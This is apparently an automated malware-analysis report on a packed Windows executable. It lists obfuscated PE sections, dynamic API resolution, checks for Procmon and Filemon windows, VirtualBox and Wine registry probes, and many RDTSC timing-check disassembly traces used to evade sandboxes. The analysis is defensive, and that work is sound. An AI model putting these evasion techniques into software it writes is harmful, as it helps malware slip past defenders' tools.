Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1801728 > 1048576
Source: file.exe | Static PE information: Raw size of dnuvwdxn is bigger than: 0x100000 < 0x19da00

              Data Obfuscation

              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.8c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dnuvwdxn:EW;nviifddd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dnuvwdxn:EW;nviifddd:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E63C0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_008E63C0
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1c274a should be: 0x1b8d69
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: dnuvwdxn
              Source: file.exeStatic PE information: section name: nviifddd
              Source: file.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE809C push 0FD42B28h; mov dword ptr [esp], ebx | 0_2_00BE80E5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE809C push ecx; mov dword ptr [esp], eax | 0_2_00BE80FC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CBA8ED push eax; mov dword ptr [esp], ecx | 0_2_00CBA97A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3F0EA push eax; mov dword ptr [esp], edi | 0_2_00C3F1B8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3F0EA push eax; mov dword ptr [esp], esp | 0_2_00C3F1BC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3F0EA push ebp; mov dword ptr [esp], 5D4B62D7h | 0_2_00C3F1CF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3F0EA push 3050A62Bh; mov dword ptr [esp], eax | 0_2_00C3F1DF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3F0EA push edx; mov dword ptr [esp], ebx | 0_2_00C3F281
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3F0EA push 1184A004h; mov dword ptr [esp], esi | 0_2_00C3F296
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3F0EA push esi; mov dword ptr [esp], ebp | 0_2_00C3F2DB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CF40FE push 0DB67665h; mov dword ptr [esp], edi | 0_2_00CF4144
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C778F0 push 52BA2576h; mov dword ptr [esp], esi | 0_2_00C77908
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C778F0 push edx; mov dword ptr [esp], ebp | 0_2_00C7790F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C778F0 push 55F59D78h; mov dword ptr [esp], esp | 0_2_00C77999
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C778F0 push esi; mov dword ptr [esp], 6B6A8962h | 0_2_00C779A5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C778F0 push 45B86A00h; mov dword ptr [esp], edi | 0_2_00C77A6A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C778F0 push edi; mov dword ptr [esp], ebx | 0_2_00C77A71
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C778F0 push ecx; mov dword ptr [esp], edi | 0_2_00C77AA1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C778F0 push 0C36A646h; mov dword ptr [esp], ebp | 0_2_00C77B18
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C778F0 push ebp; mov dword ptr [esp], ecx | 0_2_00C77B90
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C778F0 push edx; mov dword ptr [esp], eax | 0_2_00C77BB3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C778F0 push ebp; mov dword ptr [esp], edx | 0_2_00C77C0E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C778F0 push ebx; mov dword ptr [esp], eax | 0_2_00C77C52
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C778F0 push ebx; mov dword ptr [esp], ebp | 0_2_00C77C8A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C778F0 push eax; mov dword ptr [esp], 003DFF74h | 0_2_00C77CA3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C778F0 push eax; mov dword ptr [esp], ebx | 0_2_00C77CAE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C778F0 push 28C93C5Eh; mov dword ptr [esp], ebp | 0_2_00C77D42
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C778F0 push 1525B940h; mov dword ptr [esp], ebp | 0_2_00C77E03
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C778F0 push 3E131802h; mov dword ptr [esp], esi | 0_2_00C77E23
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C778F0 push ebp; mov dword ptr [esp], ecx | 0_2_00C77EB3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C778F0 push ecx; mov dword ptr [esp], esp | 0_2_00C77EC9
Source: C:\Users\user\Desktop\file.exe | Static PE information: section name: dnuvwdxn entropy: 7.953787328423517

              Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E63C0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_008E63C0

              Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-28720
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B100D3 second address: B0F97F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F055D0637C8h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 popad 0x00000017 nop 0x00000018 jmp 00007F055D0637C7h 0x0000001d push dword ptr [ebp+122D008Dh] 0x00000023 jc 00007F055D0637B7h 0x00000029 call dword ptr [ebp+122D1C62h] 0x0000002f pushad 0x00000030 jmp 00007F055D0637C1h 0x00000035 xor eax, eax 0x00000037 pushad 0x00000038 mov eax, ecx 0x0000003a mov dword ptr [ebp+122D1A5Bh], eax 0x00000040 popad 0x00000041 mov edx, dword ptr [esp+28h] 0x00000045 stc 0x00000046 mov dword ptr [ebp+122D2C59h], eax 0x0000004c mov dword ptr [ebp+122D1A5Bh], eax 0x00000052 mov esi, 0000003Ch 0x00000057 jbe 00007F055D0637C3h 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 add dword ptr [ebp+122D2EEFh], eax 0x00000067 lodsw 0x00000069 jmp 00007F055D0637BBh 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 sub dword ptr [ebp+122D2EEFh], esi 0x00000078 mov ebx, dword ptr [esp+24h] 0x0000007c jo 00007F055D0637BCh 0x00000082 mov dword ptr [ebp+122D1C80h], ecx 0x00000088 nop 0x00000089 jno 00007F055D0637C9h 0x0000008f push eax 0x00000090 push ecx 0x00000091 push eax 0x00000092 push edx 0x00000093 push eax 0x00000094 push edx 0x00000095 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0F97F second address: B0F983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8A1A9 second address: C8A1CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F055D0637B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F055D0637CAh 0x00000012 jmp 00007F055D0637C4h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D3A0 second address: C7D3D1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F055C7C8326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F055C7C833Fh 0x00000010 pop esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D3D1 second address: C7D3D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D3D5 second address: C7D3EA instructions: 0x00000000 rdtsc 0x00000002 je 00007F055C7C8326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jnp 00007F055C7C8326h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C895C1 second address: C895D1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F055D0637BAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C895D1 second address: C895D6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C895D6 second address: C895DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C896F8 second address: C896FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C896FD second address: C8971F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F055D0637BEh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pushad 0x0000000d jc 00007F055D0637B6h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C89856 second address: C8986A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F055C7C832Dh 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8986A second address: C8987C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F055D0637BEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8987C second address: C89890 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jns 00007F055C7C8326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F055C7C8326h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8C73E second address: C8C753 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8C753 second address: C8C78C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F055C7C832Fh 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D1B86h], eax 0x00000012 push 00000000h 0x00000014 push 11381D08h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F055C7C8334h 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8C78C second address: C8C796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F055D0637B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8C796 second address: C8C7F9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F055C7C8326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 11381D88h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F055C7C8328h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d mov dx, si 0x00000030 mov ecx, dword ptr [ebp+122D2BF9h] 0x00000036 push 00000003h 0x00000038 add esi, 0B001B93h 0x0000003e push 00000000h 0x00000040 movzx ecx, si 0x00000043 push 00000003h 0x00000045 js 00007F055C7C832Ch 0x0000004b or ecx, 63F820AEh 0x00000051 push 8DF28B64h 0x00000056 push edx 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8C7F9 second address: C8C817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 xor dword ptr [esp], 4DF28B64h 0x0000000d lea ebx, dword ptr [ebp+124505C4h] 0x00000013 sub cx, 0FFCh 0x00000018 push eax 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8C849 second address: C8C84F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8C84F second address: C8C854 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8C854 second address: C8C867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8C867 second address: C8C86B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8C98A second address: C8C994 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F055C7C8326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8CA07 second address: C8CAA8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F055D0637C9h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F055D0637B8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 push 00000000h 0x0000002a jmp 00007F055D0637C5h 0x0000002f call 00007F055D0637B9h 0x00000034 jmp 00007F055D0637C7h 0x00000039 push eax 0x0000003a je 00007F055D0637CCh 0x00000040 push ecx 0x00000041 jmp 00007F055D0637C4h 0x00000046 pop ecx 0x00000047 mov eax, dword ptr [esp+04h] 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8CAA8 second address: C8CAAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8CAAC second address: C8CAB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8CAB0 second address: C8CAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8CAB6 second address: C8CB2C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F055D0637BBh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d jp 00007F055D0637CDh 0x00000013 push eax 0x00000014 jmp 00007F055D0637C5h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e jmp 00007F055D0637BEh 0x00000023 pop eax 0x00000024 mov ecx, 64DB2201h 0x00000029 push 00000003h 0x0000002b jng 00007F055D0637B6h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 pop edi 0x00000035 sub cl, 00000077h 0x00000038 push 00000003h 0x0000003a call 00007F055D0637B9h 0x0000003f push eax 0x00000040 push edx 0x00000041 push edi 0x00000042 jmp 00007F055D0637C0h 0x00000047 pop edi 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8CB2C second address: C8CB42 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F055C7C832Ch 0x00000008 ja 00007F055C7C8326h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8CB42 second address: C8CB4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F055D0637B6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8CB4D second address: C8CB5F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8CB5F second address: C8CB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8CB68 second address: C8CBBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jo 00007F055C7C832Ch 0x00000010 jg 00007F055C7C8326h 0x00000016 jmp 00007F055C7C832Dh 0x0000001b popad 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push edi 0x00000021 pushad 0x00000022 jmp 00007F055C7C8331h 0x00000027 push edi 0x00000028 pop edi 0x00000029 popad 0x0000002a pop edi 0x0000002b pop eax 0x0000002c lea ebx, dword ptr [ebp+124505D8h] 0x00000032 jnl 00007F055C7C8328h 0x00000038 mov edi, ecx 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push edi 0x00000040 pop edi 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8CBBD second address: C8CBC7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F055D0637B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DBA0 second address: C9DBB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C8333h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DBB7 second address: C9DBBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAD029 second address: CAD040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 jmp 00007F055C7C832Ah 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAD040 second address: CAD044 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7EE07 second address: C7EE24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F055C7C8326h 0x0000000a pop eax 0x0000000b jg 00007F055C7C8332h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7EE24 second address: C7EE42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637C3h 0x00000007 push eax 0x00000008 jns 00007F055D0637B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB22C second address: CAB25B instructions: 0x00000000 rdtsc 0x00000002 js 00007F055C7C8326h 0x00000008 jmp 00007F055C7C832Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push ecx 0x00000011 jmp 00007F055C7C8331h 0x00000016 push eax 0x00000017 push edx 0x00000018 jne 00007F055C7C8326h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB3A1 second address: CAB3A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB3A5 second address: CAB3BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F055C7C8326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F055C7C832Ch 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7EE20 second address: C7EE24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB534 second address: CAB53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB53A second address: CAB542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB67C second address: CAB694 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C832Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F055C7C8326h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB7D1 second address: CAB7E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007F055D0637B8h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB7E7 second address: CAB7F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB7F1 second address: CAB80E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F055D0637C4h 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB80E second address: CAB818 instructions: 0x00000000 rdtsc 0x00000002 je 00007F055C7C8332h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB94A second address: CAB94E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB94E second address: CAB979 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C8337h 0x00000007 jmp 00007F055C7C832Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB979 second address: CAB97F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB97F second address: CAB98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F055C7C8326h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB98E second address: CAB992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CABAF7 second address: CABB01 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F055C7C8326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CABB01 second address: CABB10 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 jl 00007F055D0637B6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
